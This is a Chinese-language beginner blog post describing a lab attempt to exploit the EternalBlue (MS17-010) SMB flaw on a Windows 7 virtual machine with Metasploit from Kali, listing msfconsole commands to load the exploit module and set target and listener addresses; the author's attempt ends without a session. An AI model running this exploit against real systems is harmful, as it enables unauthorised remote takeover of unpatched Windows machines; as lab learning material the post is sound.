【MSF】Kali最强渗透工具之Metasploit

1.什么是Metaspolit？

        msf是一款开源安全漏洞利用和测试工具，集成了各种平台上常见的溢出漏洞和流行的shellcode，并持续保持更新。

       类似于msf有一个神奇的魔法，能让复杂的漏洞攻击的流程变得非常简单，一个电脑小白经过几小时的学习，就能对操作系统等主流漏洞发起危害性攻击。

2.体验Kali渗透工具——metasploit

metasploit攻击windows操作系统

msfconsole：启动metasploit命令行

启动metasploit前需要做：

- 打开kali终端

- 使用sudo su 命令，并输入kali的密码kali，切换至root用户

- 使用msfdb init命令 初始化metasploit数据库（*可选）

 打开kali终端，输入sudo su，输入密码kali后可以看到如下图所示界面：

输入msfconsole，即可打开msf6版本（也可以是mfs5版本），加载中如下图所示：

加载完成打开msf后界面如下图所示：

3.“永恒之蓝”漏洞

      永恒之蓝是指2017年4月14日晚，黑客团体Shadow Brokers（影子经纪人）公布一大批网络攻击工具，其中包含“永恒之蓝”工具，“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。

metasploit攻击永恒之蓝全流程：

1.使用模块

use exploit/windows/smb/ms17_010_eternalblue

2.设置必选项

→查看必选项[*required为yes的就是必选项]

show options

3.1查找模块

查找模块 search 模块名，例如此处永恒之蓝即ms17_010

3.2使用模块

       如果要使用上述呈现出的四个模块中的一个模块，可以通过use 模块号 或者use 模块名，如下图所示：

3.3查看必选项

       接着在设置必选项之前先查看必选项，使用命令show options 或者直接输入options，如下图所示：

       选择一个操作系统（2017年之前的版本一般都有永恒之蓝漏洞），建议选择Windows7 64位操作系统，这里就省略VMware Workstation安装Windows7的步骤了。

这里提供一个操作系统下载网址:msdn.itellyou.cn

      此处安装的是windows7 64x虚拟机，使之与kali虚拟机在同一网段中，即两台虚拟机能够互相ping通。

在windows7虚拟机中查看IP地址，使用ipconfig命令，如下图所示：

       可以得知该windows虚拟机的IP地址为192.168.1.129，ping 192.168.1.136，ping通如下所示：

      在kali机终端也执行以下命令ping 192.168.1.129（windows7 ip），ping通如下图所示：

此处遇到了一个小小问题：出现kali机和windows机连在同一网段，windows机能ping通kali机，而kali机无法ping通Windows的情况，最后通过关闭windows防火墙解决了问题。如下图所示：

3.4设置必选项

3.4.1 设置RHOSTS

输入命令set  RHOSTS 192.168.1.129   （Windows7 IP），如下图所示：

3.4.2 设置Payload options

输入命令 set LHOST 192.168.1.136   （kali机IP），如下图所示：

LPORT可以随意修改，只要端口没有被占用均可。

设置完成后再次通过show options查看必选项，如下图所示：

3.5 run实现攻击模块

（Windows7靶机）

Exploit completed, but no session was created.此时显示攻击完成，但未创建会话。

又遇到问题啦

此时说明攻击者没有获取到目标系统的远程访问权限。

开启方法：将远程连接开启，win7下右击我的电脑选择属性，属性窗口选择左边的远程设置，远程协议勾选，远程桌面选择允许任意版本远程桌面的计算机连接，如下图所示:

学到这报一丝，还是没能成功，渗透攻击有可能成功也有可能失败，漏洞在不断修复之中，对于我这个刚开始学渗透的小白来说真是路漫漫其修远兮啊~

求大佬带带！呜呜~小邹加油呀